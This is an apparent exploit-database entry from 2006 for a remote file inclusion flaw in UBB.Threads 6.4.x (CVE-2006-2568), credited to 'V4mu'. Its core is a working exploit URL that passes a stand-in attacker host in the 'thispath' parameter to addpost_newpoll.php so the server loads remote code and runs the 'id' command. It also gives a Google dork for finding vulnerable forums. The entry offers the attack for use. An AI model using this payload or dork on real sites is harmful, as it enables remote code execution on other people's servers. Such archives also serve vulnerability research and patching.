UBBCentral UBB.Threads 6.4.x < 6.5.2 - 'thispath' Remote File Inclusion
Author: V4mu
type: webapps
platform: php
port:
date_added: 2006-05-21
date_updated:
verified: 1
codes: OSVDB-25714;CVE-2006-2568
tags:
aliases:
screenshot_url:
application_url:
Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion
founded by V4mu in 04/20/2006
URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"
exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
contact: irc.gigachat.net #A1TS
# milw0rm.com [2006-05-22]